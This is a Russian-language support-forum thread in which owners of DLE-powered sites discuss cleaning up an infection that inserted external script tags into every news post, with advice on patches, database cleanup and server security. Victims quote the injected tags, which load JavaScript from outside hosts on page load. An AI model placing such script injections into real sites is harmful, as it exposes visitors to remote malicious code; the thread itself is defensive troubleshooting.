Перейти к публикации

Рекомендованные сообщения

обновитесь до актуальной версии, там есть раздел перестроения новостей, он зачистит зловредный код.

А что делать тем, у кого была лицензия на 1 год и обновление до версии 9.2 уже не установить? Есть какие-то варианты излечиться?)

Проблема такая же - во всех новостях появились скрипты:

<script src="http://zheenix.msk.ru/3ad17698332f903033711f449ebd0e77.js" type="text/javascript"></script><script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>

Ссылка на сообщение
Поделиться на других сайтах

Jetix,

Проверить fullstory.tpl.

Проверить БД, по-моему "Поиск и замена" должна помочь если проблема в бд.

Ссылка на сообщение
Поделиться на других сайтах

Jetix,

Проверить fullstory.tpl.

Проверить БД, по-моему "Поиск и замена" должна помочь если проблема в бд.

В шаблонах всё в порядке, в БД действительно во всех новостях присутствуют эти скрипты. Попробовал удалить их в phpMyAdmin - так вместо этого удалились все новости - хорошо бэкап был) как из БД эту заразу убрать можно?)

Вот тут ещё проблему обсуждают - http://www.maultalk.com/topic75180s0.html

Сложность в том, что у троянских JS-файлов динамические названия! Если через phpMyAdmin заменять, то не получится(

Изменено пользователем Jetix
Ссылка на сообщение
Поделиться на других сайтах

Jetix,

Динамические названия путей к js скрипту? Тогда заменил бы <script ... тупо, но это не выход. Вы все патчи ставили которые на оф сайте?

Ссылка на сообщение
Поделиться на других сайтах

Jetix,

Динамические названия путей к js скрипту? Тогда заменил бы <script ... тупо, но это не выход. Вы все патчи ставили которые на оф сайте?

Да, в каждой новости названия JS-файлов разное, такого формата http://zheenix.msk.ru/ХХХХХХХХХХХХХХХХХХХХХХХ.js, где вместо ХХХХХХХХХХХХХХХХХХ любая буква/цифра. И да, все патчи с сайта ставились. Сегодня на всякий проверил. Версия DLE 8.3.

Ссылка на сообщение
Поделиться на других сайтах

Смотрю тут много сегодня покосило....я вот тоже попал под http://zheenix.msk.r...ХХХХХХХХХХХХ.js

Это какая-то новая дыра, видимо, т.к. у меня версия 8.5, все залатано.

Смотрел логи сервера...из подозрительного и непонятного в ошибках за последние сутки нашел:

[07-ñÎ×-2011] PHP Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /home/public_html/engine/classes/mysqli.class.php on line 101

Может спецам это поможет для определения дырки?

Ссылка на сообщение
Поделиться на других сайтах

Это какая-то новая дыра, видимо, т.к. у меня версия 8.5, все залатано.

Ничего нового, причина стара как мир, либо нелегальные копии или неустановленные ранее патчи безопасности, или сторонние модули, либо также шеллы не очищенные с первого раза после установки патчей, либо необновленный уязвимый phpMyAdmin на сервере.

Ссылка на сообщение
Поделиться на других сайтах

1.В main.tpl обнаружено

<script type="text/javascript" src="{THEME}/lib/gzip/js.php-id=3c3c95f209a65d1207e91f9c654905b0"></script>
файл сам тут http://www.ex.ua/view_storage/462164216347 2. В папке шаблонов обнаружен catlist.php с содержимым
<?php $sql_result = $db->query("select ct.id, ct.alt_name, ct.name, (select count(*) from ". PREFIX ."_post ps where ps.category = ct.id AND (DATE_FORMAT(date, '%Y%m%d')=CURDATE()) AND approve = '1') as new_, (select count(*) from ". PREFIX ."_post ps where ps.category = ct.id AND approve = '1') as allnews_ from ". PREFIX ."_category ct");while($row = $db->get_row($sql_result)){echo('<li><a href="'.$config['http_home_url'].$row['alt_name'].'/">'.$row['name'].'</a> ('.($row['allnews_']).')</li>');}?>

Все обнаружено антивирусом движка, и все удалено, папка шаблонов поставлена как ридонли.

Этого достаточно?

Изменено пользователем SFW
Ссылка на сообщение
Поделиться на других сайтах

SFW,

Вообще то это вас какой то модуль был в шаблонах. Это код вывода списка категорий, для меню, а не зловредный код.

Ссылка на сообщение
Поделиться на других сайтах

SFW,

Вообще то это вас какой то модуль был в шаблонах. Это код вывода списка категорий, для меню, а не зловредный код.

Спасибо, абсолютно не силен в php - поэтому доверился сообщению админки - что это подозрительный файл.

SFW,

Я бы еще запрет на выполнение php в папки templates и uploads поставил.

Спасибо , сделал.

Ссылка на сообщение
Поделиться на других сайтах

Вот тут подробное решение проблемы очистки базы данных от посторонних JS-скриптов:

http://www.maultalk.com/topic75180.html?view=findpost&p=892547

Сам сейчас так сделал - всё ок!

Ссылка на сообщение
Поделиться на других сайтах

Мне не помогло ридонли.

Появляются снова и снова скрипты.

Что делать?

После бага с ретривом пассворда администратора, теперь этот косяк, DLE реально начинает напрягать.

Изменено пользователем SFW
Ссылка на сообщение
Поделиться на других сайтах

Мне не помогло ридонли.

Появляются снова и снова скрипты.

Что делать?

После бага с ретривом пассворда администратора, теперь этот косяк, DLE реально начинает напрягать.

В таком случае скрипт вам ничем не поможет, если на файлы не было прав на запись, значит изменения в файлы производились не скриптами а с доступами выше скриптов, например по FTP. И вам уже нужно заниматься безопасностью сервера и своего компьютера. Вы почему то решили что если стоит DLE, то значит проблема именно в DLE, помимо DLE на сервере стоит с десяток программ, безопасностью которых также нужно заниматься. Также изучите темы:

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

И поймете как воруются доступы с ваших комьютеров, в которых они храняться.

Да и кстати какие скрипты у вас появляются и где, например то что вы писали выше http://forum.dle-news.ru/index.php?showtopic=53254&view=findpost&p=262650 не являются никакими шеллами и зловредными скриптами в принципе. Это фреймворк mootols и модуль вывода списка категорий, я вам об этом уже писал

Ссылка на сообщение
Поделиться на других сайтах

Извините , может быть дело действительно не в скрипте.

Устал просто тратить время на такую чепуху как чистку новостей от скриптов. И нет понятия как это прекратить.

Ссылка на сообщение
Поделиться на других сайтах

Устал просто тратить время на такую чепуху как чистку новостей от скриптов. И нет понятия как это прекратить.

Я сейчас не понял у вас где скрипты появляются? Раньше вы писали что в файлах, сейчас что в новостях. Это большая и принципиальная разница. Вы на свой скрипт все патчи установили http://dle-news.ru/bags/ ?

Ссылка на сообщение
Поделиться на других сайтах

Вот мне интересно!Почему сайты на дле ломают (даже если все баги закрыты(которые указаны на офф сайте)),а ваш немогут сломать?!Вы случайно сами ничего не мутите?

Ссылка на сообщение
Поделиться на других сайтах

Вот мне интересно!Почему сайты на дле ломают (даже если все баги закрыты(которые указаны на офф сайте)),а ваш немогут сломать?!Вы случайно сами ничего не мутите?

Уже сто раз писали что сломать могут не через DLE, а через серверные программы

Ссылка на сообщение
Поделиться на других сайтах

Вот мне интересно!Почему сайты на дле ломают (даже если все баги закрыты(которые указаны на офф сайте)),а ваш немогут сломать?!Вы случайно сами ничего не мутите?

Уже сто раз писали что сломать могут не через DLE, а через серверные программы

Хоть 300000 раз!я второй раз всего на этом форуме!

Ссылка на сообщение
Поделиться на других сайтах

Вот мне интересно!Почему сайты на дле ломают (даже если все баги закрыты(которые указаны на офф сайте)),а ваш немогут сломать?!

За всю свою практику, и осмотр огромного количества сайтов, еще не видел ниодного сайта на лицензионном скрипте, который бы взломали, и на котором стояли патчи, но при этом он не был бы завален еще кучей скриптов, хаков и модулей, сомнительного содержания и авторства.

Вы случайно сами ничего не мутите?

Конечно мучу, не ставлю всякое барахло на сайт подряд, и слежу за исправлениями другого серверного ПО.

Ссылка на сообщение
Поделиться на других сайтах

вы хотите сказать что тот хостинг где я размещаю сайт, сайт который ни кому не нужен, фуфловый. ( а хотсер таймвеб )

на этом хостинге есть крутые сайты, почему их не ломанули через phpMyAdmin

смысл ламать phpMyAdmin, ну и dle фуфловые сайты трогать.

по поводу защиты заливки в папку upload как это сделать ?

Изменено пользователем delshka
Ссылка на сообщение
Поделиться на других сайтах

вы хотите сказать что тот хостинг где я размещаю сайт, сайт который ни кому не нужен, фуфловый

где вам такое писали?

по поводу защиты заливки в папку upload как это сделать

Начните с соблюдения правил форума.

Ссылка на сообщение
Поделиться на других сайтах

celsoft,

А как научиться выявлять такие вот подозрительные модули через которые якобы вся беда? :) Или довольствоваться стандартными средствами DLE что в принципе не вижу возможным.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...